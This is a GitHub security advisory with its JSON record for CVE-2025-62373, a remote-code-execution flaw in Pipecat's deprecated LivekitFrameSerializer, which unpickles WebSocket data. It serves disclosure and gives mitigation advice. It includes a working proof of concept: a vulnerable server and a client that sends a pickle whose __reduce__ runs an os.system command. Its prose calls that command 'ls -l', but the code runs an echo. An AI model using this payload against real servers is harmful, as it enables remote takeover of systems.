GHSA-C2JG-5CP7-6WC7
Vulnerability from github – Published: 2026-04-23 21:15 – Updated: 2026-04-23 21:15Remote Code Execution via Unsafe Deserialization in Pipecat's LivekitFrameSerializer
Summary
A critical vulnerability exists in Pipecat's LivekitFrameSerializer – an optional, non-default, undocumented frame serializer class (now deprecated) intended for LiveKit integration. The class's deserialize() method uses Python's pickle.loads() on data received from WebSocket clients without any validation or sanitization. This means that a malicious WebSocket client can send a crafted pickle payload to execute arbitrary code on the Pipecat server. The vulnerable code resides in src/pipecat/serializers/livekit.py (around line 73), where untrusted WebSocket message data is passed directly into pickle.loads() for deserialization. If a Pipecat server is configured to use LivekitFrameSerializer and is listening on an external interface (e.g. 0.0.0.0), an attacker on the network (or the internet, if the service is exposed) could achieve remote code execution (RCE) on the server by sending a malicious pickle payload.
Details
The LivekitFrameSerializer is a serializer meant to convert between Pipecat audio frames and LiveKit's audio frame format. It is not enabled by default – developers would have to explicitly use this serializer. In Pipecat version 0.0.90, this class was officially deprecated in favor of a safer LiveKitTransport method, but it remains in the code for backward compatibility. The vulnerability arises in how it handles incoming data: the deserialize() method blindly unpickles whatever byte stream it receives over the WebSocket. Below is a snippet illustrating the core issue in the LivekitFrameSerializer.deserialize implementation:
Vulnerable code in src/pipecat/serializers/livekit.py:
async def deserialize(self, data: str | bytes) -> Frame | None:
# ... (docstring omitted for brevity)
audio_frame: AudioFrame = pickle.loads(data)["frame"] # Unsafely deserializing untrusted data
return InputAudioRawFrame(
audio=bytes(audio_frame.data),
sample_rate=audio_frame.sample_rate,
num_channels=audio_frame.num_channels,
)
Python's pickle.loads will execute arbitrary code if the input data is a maliciously crafted pickle object. In this case, an attacker can exploit the LivekitFrameSerializer by sending a pickle payload that, when deserialized, runs attacker-controlled code on the server. The serializer assumes the data contains a LiveKit AudioFrame object (possibly in a dictionary with key "frame"), but does not verify the content or source. As a result, any object with a malicious __reduce__ or other pickle protocol methods will be executed upon deserialization. This is a known risk: pickle should never be used on untrusted data.
In summary, whenever LivekitFrameSerializer is active, any client that can connect to the Pipecat WebSocket can send a specially crafted pickle binary. Upon receiving it, Pipecat will call pickle.loads, immediately executing the payload's code. This can lead to a full compromise of the Pipecat server process, allowing attackers to run arbitrary commands or take control of the host system with the privileges of the Pipecat service.
Proof of Concept (PoC)
The following proof-of-concept demonstrates how an attacker could exploit this vulnerability. It involves two steps: (1) running a Pipecat WebSocket server using the vulnerable serializer, and (2) sending a malicious pickle from a client.
Start a Pipecat WebSocket server with the LivekitFrameSerializer enabled – for example, by binding the server to all network interfaces (0.0.0.0) on port 8765. In a Pipecat application, this might be done by specifying the LiveKit serializer in the WebSocket transport parameters. For illustration, the code snippet below starts a server:
import asyncio
import websockets
from pipecat.serializers.livekit import LivekitFrameSerializer
serializer = LivekitFrameSerializer()
async def handler(ws):
"""
websockets new-style handler: single argument (connection object).
Path (if needed) is available via ws.path.
"""
try:
data = await ws.recv()
if isinstance(data, str):
data = data.encode("utf-8")
frame = await serializer.deserialize(data)
print("deserialize returned:", frame)
except Exception as e:
print("deserialize raised:", repr(e))
async def main():
print("Starting server on 0.0.0.0:8765 (websockets new API handler)")
async with websockets.serve(handler, "0.0.0.0", 8765):
await asyncio.Future() # run forever
if __name__ == "__main__":
asyncio.run(main())
In this setup, the server listens on ws://0.0.0.0:8765 (with a default path of /ws for WebSocket connections). It will use LivekitFrameSerializer for incoming frames, making it vulnerable to pickle-based attacks.
Send a malicious pickle payload from a client – an attacker can now connect to the WebSocket and transmit a crafted pickle object that executes code. For instance, the payload below defines a class RCE whose __reduce__ method will invoke os.system("ls -l"). When unpickled on the server, this will run the ls -l command (listing directory contents) on the server side:
import asyncio
import pickle
import websockets
class RCE:
def __reduce__(self):
import os
return (os.system, ("echo EXPLOITED > /tmp/pipecat_exploit || true",))
async def attack():
uri = "ws://127.0.0.1:8765"
async with websockets.connect(uri) as ws:
payload = pickle.dumps({"frame": RCE()})
await ws.send(payload)
if __name__ == "__main__":
asyncio.run(attack())
In this PoC, the attacker's code opens a WebSocket connection to the Pipecat server and sends the pickled RCE object. On the server, the `LivekitFrameSerializer.deserialize()` method will call pickle.loads() on this data, which in turn triggers the `RCE.__reduce__` method. This executes the `os.system("ls -l")` command on the server. In a real attack, the payload could be crafted to perform any arbitrary actions (create a reverse shell, modify files, etc.) with the privileges of the Pipecat process.
Impact
If an application uses LivekitFrameSerializer and exposes the Pipecat WebSocket server to untrusted networks, an attacker can achieve remote code execution on the server with a single malicious message. This could lead to a complete compromise of the server: the attacker can execute operating system commands, read or modify data, install malware, or pivot to other systems. The severity of this vulnerability is high – any code execution vulnerability is critical, especially in a real-time communications server context.
It's important to note that by default Pipecat does not use LivekitFrameSerializer (and in fact the class is deprecated), so only systems that explicitly opt into this serializer are affected. However, because the class exists in the codebase, users might inadvertently use it. Any such usage on a public-facing or even internal network service can be exploited by an attacker with network access to the service. The worst-case scenario is an internet-exposed Pipecat server using this serializer, which would allow remote exploitation by anyone with access to the WebSocket port.
Mitigation
Users of Pipecat should take the following actions to eliminate or reduce the risk of this vulnerability:
-
Avoid or replace unsafe deserialization: Ideally, do not use
LivekitFrameSerializerat all given its use of unsafe pickle deserialization. Pipecat's maintainers have deprecated this class in favor ofLiveKitTransport, which does not require explicit pickle usage. If users need to support LiveKit integration or any binary frame serialization, use safer alternatives:* Use standardized formats like JSON for simple structured data, or binary formats like Protocol Buffers or MessagePack for more complex data structures. These formats do not execute code upon parsing. * If users absolutely must use pickle (not recommended), implement a custom `pickle.Unpickler` with a restricted `find_class()` method. This can limit what classes and functions can be instantiated during unpickling (whitelisting only safe types), which can mitigate arbitrary code execution. However, even a restricted unpickler is risky and should be considered a last resort. -
Improve network security configuration: Limit who can reach the Pipecat service.
* Bind to localhost whenever possible. If the Pipecat server is intended for internal or single-machine use, use host="127.0.0.1" (or omit the host to default to localhost) instead of 0.0.0.0. This prevents external network access by default and significantly reduces exposure. * Require authentication and authorization on the WebSocket connection. If the use case allows, enforce that clients must authenticate (using tokens, API keys, or other means) before accepting and processing frames. This won't fix the underlying code issue, but it can restrict who is able to send potentially malicious data.
In summary, the best mitigation is to stop using the vulnerable LivekitFrameSerializer altogether. If users require LiveKit functionality, upgrade to the latest Pipecat version and switch to the recommended LiveKitTransport or another secure method provided by the framework. Additionally, always follow secure coding practices: never trust client-supplied data, and avoid Python pickle (or similar unsafe deserialization) in network-facing components.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pipecat-ai"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.41"
},
{
"fixed": "0.0.94"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62373"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-23T21:15:42Z",
"nvd_published_at": "2026-04-23T16:16:24Z",
"severity": "CRITICAL"
},
"details": "Remote Code Execution via Unsafe Deserialization in Pipecat\u0027s LivekitFrameSerializer\n\n### Summary\n\nA critical vulnerability exists in Pipecat\u0027s `LivekitFrameSerializer` \u2013 an **optional, non-default, undocumented** frame serializer class (now deprecated) intended for LiveKit integration. The class\u0027s `deserialize()` method uses Python\u0027s `pickle.loads()` on data received from WebSocket clients without any validation or sanitization. This means that a malicious WebSocket client can send a crafted pickle payload to execute arbitrary code on the Pipecat server. The vulnerable code resides in `src/pipecat/serializers/livekit.py` (around line 73), where untrusted WebSocket message data is passed directly into `pickle.loads()` for deserialization. If a Pipecat server is configured to use LivekitFrameSerializer and is listening on an external interface (e.g. 0.0.0.0), an attacker on the network (or the internet, if the service is exposed) could achieve remote code execution (RCE) on the server by sending a malicious pickle payload.\n\n### Details\n\nThe `LivekitFrameSerializer` is a serializer meant to convert between Pipecat audio frames and LiveKit\u0027s audio frame format. **It is not enabled by default** \u2013 developers would have to explicitly use this serializer. In Pipecat version 0.0.90, this class was officially deprecated in favor of a safer `LiveKitTransport` method, but it remains in the code for backward compatibility. The vulnerability arises in how it handles incoming data: the `deserialize()` method blindly unpickles whatever byte stream it receives over the WebSocket. Below is a snippet illustrating the core issue in the `LivekitFrameSerializer.deserialize` implementation:\n\nVulnerable code in src/pipecat/serializers/livekit.py:\n\n```python\nasync def deserialize(self, data: str | bytes) -\u003e Frame | None:\n # ... (docstring omitted for brevity)\n audio_frame: AudioFrame = pickle.loads(data)[\"frame\"] # Unsafely deserializing untrusted data\n return InputAudioRawFrame(\n audio=bytes(audio_frame.data),\n sample_rate=audio_frame.sample_rate,\n num_channels=audio_frame.num_channels,\n )\n```\n\nPython\u0027s `pickle.loads` will execute arbitrary code if the input data is a maliciously crafted pickle object. In this case, an attacker can exploit the `LivekitFrameSerializer` by sending a pickle payload that, when deserialized, runs attacker-controlled code on the server. The serializer assumes the data contains a LiveKit `AudioFrame` object (possibly in a dictionary with key \"frame\"), but does not verify the content or source. As a result, any object with a malicious `__reduce__` or other pickle protocol methods will be executed upon deserialization. This is a known risk: pickle should never be used on untrusted data.\n\nIn summary, whenever `LivekitFrameSerializer` is active, any client that can connect to the Pipecat WebSocket can send a specially crafted pickle binary. Upon receiving it, Pipecat will call `pickle.loads`, immediately executing the payload\u0027s code. This can lead to a full compromise of the Pipecat server process, allowing attackers to run arbitrary commands or take control of the host system with the privileges of the Pipecat service.\n\n### Proof of Concept (PoC)\n\nThe following proof-of-concept demonstrates how an attacker could exploit this vulnerability. It involves two steps: (1) running a Pipecat WebSocket server using the vulnerable serializer, and (2) sending a malicious pickle from a client.\n\nStart a Pipecat WebSocket server with the LivekitFrameSerializer enabled \u2013 for example, by binding the server to all network interfaces (0.0.0.0) on port 8765. In a Pipecat application, this might be done by specifying the LiveKit serializer in the WebSocket transport parameters. For illustration, the code snippet below starts a server:\n\n```python\nimport asyncio\nimport websockets\nfrom pipecat.serializers.livekit import LivekitFrameSerializer\n\nserializer = LivekitFrameSerializer()\n\nasync def handler(ws):\n \"\"\"\n websockets new-style handler: single argument (connection object).\n Path (if needed) is available via ws.path.\n \"\"\"\n try:\n data = await ws.recv() \n if isinstance(data, str):\n data = data.encode(\"utf-8\") \n frame = await serializer.deserialize(data) \n print(\"deserialize returned:\", frame)\n except Exception as e:\n print(\"deserialize raised:\", repr(e))\n\nasync def main():\n print(\"Starting server on 0.0.0.0:8765 (websockets new API handler)\")\n async with websockets.serve(handler, \"0.0.0.0\", 8765):\n await asyncio.Future() # run forever\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n```\n\nIn this setup, the server listens on ws://0.0.0.0:8765 (with a default path of /ws for WebSocket connections). It will use `LivekitFrameSerializer` for incoming frames, making it vulnerable to pickle-based attacks.\n\nSend a malicious pickle payload from a client \u2013 an attacker can now connect to the WebSocket and transmit a crafted pickle object that executes code. For instance, the payload below defines a class RCE whose `__reduce__` method will invoke `os.system(\"ls -l\")`. When unpickled on the server, this will run the `ls -l` command (listing directory contents) on the server side:\n\n```python\nimport asyncio\nimport pickle\nimport websockets\n\nclass RCE:\n def __reduce__(self):\n import os\n return (os.system, (\"echo EXPLOITED \u003e /tmp/pipecat_exploit || true\",))\n\nasync def attack():\n uri = \"ws://127.0.0.1:8765\" \n async with websockets.connect(uri) as ws:\n payload = pickle.dumps({\"frame\": RCE()})\n await ws.send(payload) \n\nif __name__ == \"__main__\":\n asyncio.run(attack())\n```\n\n In this PoC, the attacker\u0027s code opens a WebSocket connection to the Pipecat server and sends the pickled RCE object. On the server, the `LivekitFrameSerializer.deserialize()` method will call pickle.loads() on this data, which in turn triggers the `RCE.__reduce__` method. This executes the `os.system(\"ls -l\")` command on the server. In a real attack, the payload could be crafted to perform any arbitrary actions (create a reverse shell, modify files, etc.) with the privileges of the Pipecat process.\n\n### Impact\n\nIf an application uses `LivekitFrameSerializer` and exposes the Pipecat WebSocket server to untrusted networks, an attacker can achieve remote code execution on the server with a single malicious message. This could lead to a complete compromise of the server: the attacker can execute operating system commands, read or modify data, install malware, or pivot to other systems. The severity of this vulnerability is high \u2013 any code execution vulnerability is critical, especially in a real-time communications server context.\n\nIt\u0027s important to note that by default Pipecat does not use LivekitFrameSerializer (and in fact the class is deprecated), so only systems that explicitly opt into this serializer are affected. However, because the class exists in the codebase, users might inadvertently use it. Any such usage on a public-facing or even internal network service can be exploited by an attacker with network access to the service. The worst-case scenario is an internet-exposed Pipecat server using this serializer, which would allow remote exploitation by anyone with access to the WebSocket port.\n\n### Mitigation\n\nUsers of Pipecat should take the following actions to eliminate or reduce the risk of this vulnerability:\n\n1. Avoid or replace unsafe deserialization: Ideally, do not use `LivekitFrameSerializer` at all given its use of unsafe pickle deserialization. Pipecat\u0027s maintainers have deprecated this class in favor of `LiveKitTransport`, which does not require explicit pickle usage. If users need to support LiveKit integration or any binary frame serialization, use safer alternatives:\n\n * Use standardized formats like JSON for simple structured data, or binary formats like Protocol Buffers or MessagePack for more complex data structures. These formats do not execute code upon parsing.\n\n * If users absolutely must use pickle (not recommended), implement a custom `pickle.Unpickler` with a restricted `find_class()` method. This can limit what classes and functions can be instantiated during unpickling (whitelisting only safe types), which can mitigate arbitrary code execution. However, even a restricted unpickler is risky and should be considered a last resort.\n\n2. Improve network security configuration: Limit who can reach the Pipecat service.\n\n * Bind to localhost whenever possible. If the Pipecat server is intended for internal or single-machine use, use host=\"127.0.0.1\" (or omit the host to default to localhost) instead of 0.0.0.0. This prevents external network access by default and significantly reduces exposure.\n\n * Require authentication and authorization on the WebSocket connection. If the use case allows, enforce that clients must authenticate (using tokens, API keys, or other means) before accepting and processing frames. This won\u0027t fix the underlying code issue, but it can restrict who is able to send potentially malicious data.\n\nIn summary, the best mitigation is to stop using the vulnerable LivekitFrameSerializer altogether. If users require LiveKit functionality, upgrade to the latest Pipecat version and switch to the recommended `LiveKitTransport` or another secure method provided by the framework. Additionally, always follow secure coding practices: never trust client-supplied data, and avoid Python pickle (or similar unsafe deserialization) in network-facing components.",
"id": "GHSA-c2jg-5cp7-6wc7",
"modified": "2026-04-23T21:15:42Z",
"published": "2026-04-23T21:15:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-c2jg-5cp7-6wc7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62373"
},
{
"type": "PACKAGE",
"url": "https://github.com/pipecat-ai/pipecat"
},
{
"type": "WEB",
"url": "https://github.com/pipecat-ai/pipecat/releases/tag/v0.0.94"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Pipecat: Remote Code Execution by Pickle Deserialization Through LivekitFrameSerializer"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.